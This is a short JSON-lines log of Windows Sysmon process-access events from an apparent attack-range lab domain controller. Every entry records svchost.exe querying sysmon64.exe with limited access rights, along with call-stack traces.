{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.552\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.552","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
